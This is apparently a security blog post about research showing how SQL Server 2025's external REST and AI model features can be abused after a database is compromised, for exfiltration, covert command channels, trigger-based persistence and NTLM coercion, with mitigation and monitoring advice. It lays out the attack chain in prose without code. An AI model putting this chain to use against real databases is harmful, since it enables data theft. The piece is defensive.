SQL Server 2025 AI Features Can Enable Data Theft


Hackers Can Abuse SQL Server 2025 AI Features to Exfiltrate Sensitive Data

Security researchers have demonstrated how Microsoft SQL Server 2025 AI features can be abused by attackers after a database environment is compromised.

SQL Server 2025 introduces powerful AI ready capabilities for modern workloads, including support for external REST endpoints, external AI models, embeddings, vector search, and integrations designed to help organizations build AI driven applications directly around enterprise data.

Those features are valuable.

They also change the security model.

Researchers from SpecterOps showed that legitimate SQL Server 2025 features can be repurposed for sensitive data exfiltration, covert command and control, persistence, and authentication hash coercion.

For enterprises, this is an important warning.

AI features inside a database engine are not only developer conveniences. They are new execution, communication, and data movement paths that must be governed, monitored, and restricted.

What Happened:

Security researchers analyzed SQL Server 2025 AI related capabilities and demonstrated how attackers could abuse them after gaining sufficient privileges inside a SQL Server environment.

One key feature is sp_invoke_external_rest_endpoint.

This stored procedure allows SQL Server to send HTTPS requests directly to external endpoints.

The feature is legitimate and useful for connecting databases to APIs and modern application workflows.

However, researchers showed that an attacker with high level SQL Server privileges could use the procedure to query sensitive tables, convert data into structured formats, and send that data to an attacker controlled server over encrypted HTTPS.

Researchers also examined CREATE EXTERNAL MODEL and AI_GENERATE_EMBEDDINGS.

These features allow SQL Server to interact with external AI models and generate embeddings from database content.

In a malicious scenario, attackers could use these AI related functions to create covert communication channels that look like normal AI workload traffic.

Why This Issue Is Critical:

This issue is critical because SQL Server often holds the data attackers want most.

Databases may contain user records, credentials, customer information, financial data, application secrets, business records, healthcare data, transaction history, operational logs, and proprietary information.

If attackers already compromise a SQL Server instance, AI enabled features may give them a cleaner way to move data out.

Traditional defenders often watch for obvious signs of abuse such as xp_cmdshell, PowerShell execution, suspicious binaries, or unusual scripts.

SQL Server 2025 changes that assumption.

Data exfiltration may occur through a legitimate database stored procedure that sends HTTPS traffic.

Command and control may be hidden inside AI model interactions.

Persistence may be created through triggers that automatically send new or updated data to external endpoints.

That makes database monitoring and outbound traffic governance much more important.

How Data Exfiltration Could Work:

The main data theft risk centers on SQL Server’s ability to call external REST endpoints.

An attacker with sufficient privileges could query sensitive database tables and package the results into a JSON payload.

The attacker could then use sp_invoke_external_rest_endpoint to send that payload to an attacker controlled HTTPS endpoint.

Because the traffic originates from the database engine and uses encrypted web communication, it may blend in with legitimate API or AI related activity.

This is especially concerning when database servers are allowed to make outbound internet connections.

Historically, outbound traffic from a database server was often treated as suspicious.

With modern AI and API integration features, some organizations may normalize outbound database communication.

That creates a detection challenge.

Security teams need to distinguish between approved AI or API workflows and malicious data movement.

How AI Features Could Enable Covert Command Channels:

SQL Server 2025 also introduces AI model integration features that can support modern application development.

CREATE EXTERNAL MODEL can define external model connections.

AI_GENERATE_EMBEDDINGS can send data to an AI model and receive structured responses.

Researchers showed that these features could be abused to pass encoded commands and responses through AI related workflows.

Instead of deploying traditional malware, an attacker could use SQL queries and AI model calls to communicate with attacker controlled infrastructure.

This type of activity may be harder to detect because it can resemble legitimate AI workload traffic.

The database appears to be interacting with an external model.

Behind that interaction, commands and responses may be hidden inside request and response data.

This is why AI feature monitoring must include content, destination, frequency, and behavioral baselines.

Persistence Through Database Triggers:

Persistence is another concern.

Attackers may create database triggers that automatically run when certain records are inserted or updated.

For example, if a sensitive table receives new user credentials, tokens, customer records, or transaction data, a trigger could automatically send that new data to an external endpoint.

This turns the database into a continuous leakage point.

The attacker does not need to return repeatedly to manually export data.

Once the trigger is created, the database itself can continue sending fresh information.

This kind of persistence can be difficult to notice if teams are not reviewing database objects, stored procedures, triggers, outbound traffic, and unusual changes to schema logic.

NTLM Authentication Coercion Risk:

Researchers also highlighted a technique involving UNC paths in AI model configurations.

Under certain conditions, referencing UNC paths can trigger NTLM authentication attempts over SMB.

Attackers may attempt to capture or relay those authentication attempts inside a network.

This matters because NTLM relay and coercion techniques remain valuable in Windows environments.

Even when a feature is not classified as a traditional software vulnerability, the behavior can still create real operational risk if attackers can use it to force authentication or support lateral movement.

Organizations should treat database initiated SMB behavior as suspicious unless there is a clear business requirement.

How the Attack Chain Could Work:

A realistic attack path may begin when attackers compromise a SQL Server environment through stolen credentials, application compromise, exposed database access, privilege escalation, or insider abuse.

The attacker obtains high level SQL Server privileges.

Sensitive database tables are identified.

The attacker uses sp_invoke_external_rest_endpoint to send selected records to an external HTTPS endpoint.

The attacker configures external model calls to support covert communication.

The attacker creates triggers to exfiltrate future records automatically.

The attacker attempts to abuse UNC path behavior to trigger NTLM authentication and support further movement.

The database becomes both a data source and a communication channel.

This attack chain shows why SQL Server 2025 AI features must be controlled as privileged capabilities.

Why This Incident Matters for Cybersecurity:

This research reinforces a major cybersecurity reality.

Legitimate enterprise features can become attacker tools after compromise.

AI integration inside SQL Server is not inherently malicious.

It can support modern applications, retrieval augmented generation, embeddings, analytics, and intelligent data workflows.

The risk appears when attackers obtain privileges and repurpose those same features for malicious activity.

This is the same pattern defenders have seen with scripting engines, remote management tools, cloud APIs, SaaS integrations, and automation platforms.

The more powerful the feature, the more important governance becomes.

SQL Server 2025 shows that AI adoption must include database security, outbound network controls, privilege review, and monitoring from day one.

Common Risks Highlighted:

This SQL Server 2025 research highlights several common enterprise weaknesses.

Database servers may have unnecessary outbound internet access.

Sysadmin privileges may be assigned too broadly.

External REST endpoint usage may not be monitored.

AI model integrations may be enabled without security review.

Database triggers may not be reviewed regularly.

Outbound HTTPS traffic from SQL Server may be treated as normal without baselines.

NTLM authentication may still be allowed in risky paths.

Database activity monitoring may focus only on logins and failed queries.

Security teams may lack visibility into AI related database functions.

Developers may enable powerful features without involving security teams.

These weaknesses can allow legitimate SQL Server functionality to become a post compromise attack path.

Potential Impact:

The potential impact depends on database privileges, outbound network controls, and the sensitivity of stored data.

Attackers may exfiltrate sensitive records over HTTPS.

Customer data may be stolen.

Credentials, tokens, or secrets stored in databases may be exposed.

Covert command and control may be established through AI model calls.

Database triggers may create long term data leakage.

NTLM authentication attempts may be captured or relayed.

Detection may be delayed if activity appears to come from approved SQL Server features.

Incident response may become more difficult if attackers avoid traditional malware.

The highest risk environments are those where SQL Server stores sensitive data and is allowed to communicate outbound without strict controls.

What Organisations Should Do Now:

Organizations planning to use SQL Server 2025 should review AI related database features before production deployment.

Security teams should identify where sp_invoke_external_rest_endpoint is enabled or used.

External REST endpoint destinations should be approved and restricted.

Outbound traffic from database servers should be limited to known business destinations.

Sysadmin privileges should be reduced and reviewed frequently.

Use of CREATE EXTERNAL MODEL and AI_GENERATE_EMBEDDINGS should be governed through approved workflows.

Database triggers should be reviewed for unexpected behavior.

NTLM should be restricted wherever possible.

Database servers should not be allowed to initiate SMB connections unless explicitly required.

Security teams should baseline normal AI related database traffic before enabling these features widely.

AI adoption should not happen faster than security visibility.

Detection and Monitoring Strategies:

Security teams should improve monitoring around SQL Server AI and external communication features.

Monitor execution of sp_invoke_external_rest_endpoint.

Alert on external REST calls to unapproved domains or IP addresses.

Review large payload transfers from SQL Server.

Monitor CREATE EXTERNAL MODEL usage.

Monitor AI_GENERATE_EMBEDDINGS calls and destination patterns.

Review new or modified database triggers.

Alert on SQL Server initiated outbound HTTPS traffic outside approved baselines.

Monitor SQL Server initiated SMB or NTLM activity.

Review privileged account use inside SQL Server.

Correlate database events with network telemetry, identity logs, endpoint telemetry, and proxy logs.

Detection should focus on the behavior of the database engine as a network capable application.

A database server that suddenly behaves like an outbound API client deserves attention.

The Role of Incident Response Planning:

Incident response teams should prepare for database native exfiltration scenarios.

If suspicious SQL Server activity is detected, responders should preserve database logs, query history, job history, trigger definitions, stored procedure execution records, network flow logs, proxy logs, and endpoint telemetry.

They should identify which data was queried and whether it was sent externally.

They should review whether triggers or scheduled jobs were created for persistence.

They should determine whether external model definitions were added or modified.

If NTLM coercion is suspected, teams should review authentication logs and possible relay paths.

Credential rotation may be necessary if secrets or authentication material were stored in affected databases.

Database compromise should be investigated as both a data theft event and a potential internal movement event.

Penetration Testing Insight:

From a penetration testing perspective, SQL Server 2025 AI features should be included in modern database security assessments.

A strong assessment should evaluate whether attackers with database privileges can exfiltrate data through approved features.

Testing should review outbound controls, sysadmin access, database triggers, external endpoint usage, AI model configurations, and network egress from database servers.

It should also assess whether security teams can detect suspicious use of AI related functions.

The goal is not to avoid SQL Server 2025 AI capabilities.

The goal is to prove that those capabilities are governed, logged, restricted, and monitored.

Modern penetration testing should show whether a compromised database can become a covert communication and data exfiltration platform.

Expert Insight:

James Knight, Senior Principal at Digital Warfare, said:

“AI features inside database engines create powerful business value, but they also expand what an attacker can do after compromise. Security teams need to treat outbound database calls, external model integrations, and AI generated workflows as privileged capabilities that require governance and monitoring.”

What Security Leaders Should Prioritize:

Security leaders should treat this research as a database AI governance warning.

The immediate priority is identifying whether SQL Server 2025 AI features are being tested or deployed.

The broader priority is ensuring that database servers cannot become uncontrolled outbound communication channels.

Leaders should ask clear questions.

Which SQL Server systems can make outbound HTTPS requests?

Who can execute external REST endpoint procedures?

Which external AI models are approved?

Are AI related database functions logged?

Can we detect database initiated data exfiltration?

Are database triggers reviewed for suspicious behavior?

Is NTLM restricted around database infrastructure?

If teams cannot answer these questions quickly, the organization has a database AI visibility gap.

Call to Action:

Organizations adopting SQL Server 2025 should not treat AI database features as ordinary developer functionality.

Review privileges, restrict outbound access, monitor external REST endpoint usage, govern AI model integrations, inspect triggers, and confirm that SQL Server cannot become a stealthy data exfiltration or command channel.

Comments

Post a Comment

Popular posts from this blog

Signed, Trusted, Exploited: Inside the ScreenConnect Breach Playbook

Signed, Trusted, Exploited: Inside the ScreenConnect Breach Playbook A trusted remote access tool turned Trojan: today’s news reveals how attackers have hijacked ScreenConnect (now ConnectWise Control), weaponizing its legitimacy to bypass defenses and sustain access. As an independent blogger and penetration tester , this twist-from trusted utility to clandestine threat vector-highlights an urgent shift: defenders must now regard established tools as potential weapons, and our penetration testing methodologies must evolve accordingly. Attack Vector: Weaponized RMM Software Threat actors are misusing ScreenConnect installers-often digitally signed and trusted-to establish persistent access, using methods like Authenticode stuffing to embed malicious configuration while preserving legitimate signatures. Technical Abuse: CHAINVERB Downloader In several campaigns, the CHAINVERB backdoor leverages signed ScreenConnect binaries. It hides C2 instructions inside certificate fields, en...
Read more

Breaking the Chain of Trust: The Hybrid Exchange Escalation Threat

Breaking the Chain of Trust: The Hybrid Exchange Escalation Threat It starts quietly an unnoticed foothold on an Exchange server, stolen admin credentials, and a trust link to the cloud turned into a weapon. From there, it’s a clean pivot into Exchange Online , data harvested, persistence set, and the intruder disappears into normal traffic. As a  part time  penetration tester and independent blogger , I see CVE-2025-53786 as more than a flaw it’s a blueprint for abusing identity and trust. This high-severity vulnerability in hybrid Exchange lets on-prem admins escalate to the cloud with limited log visibility . The August 2025 Security Updates patch it, but with 28,000+ servers still exposed, the window remains open. CISA’s Emergency Directive 25-02 demands immediate action from federal agencies. Everyone else should take the hint attackers certainly will. The Vulnerability in One Paragraph In classic hybrid deployments, on-prem Exchange and Exchange Online could share i...
Read more

The Quiet Epidemic: How Lumma Built a Global Infostealer Network

The Quiet Epidemic: How Lumma Built a Global Infostealer Network  The quietest breaches are the ones that bleed you dry . Lumma Stealer didn’t disrupt. It infiltrated leaving no ransom note, only stolen passwords and persistent access. In 2025, over 2,300 Lumma-controlled domains were taken down in a global operation. But Lumma’s infrastructure quickly reassembled. For red teams, it’s not the takedown that matters  it’s how fast the threat returned  As an independent blogger and part-time penetration tester , I see Lumma not just as a threat, but as a blueprint for real-world attack simulation . Its infection chain stealthy delivery, in-memory payloads, modular design is exactly what red teams should be studying . Infection Chain Anatomy: From Fake CAPTCHA to Memory-Only Payload Lumma’s infection begins with deceptive tactics: fake CAPTCHA lures or cloned websites prompt users to copy/paste PowerShell commands into Run prompts via mshta.exe, often hidden behind obfusca...
Read more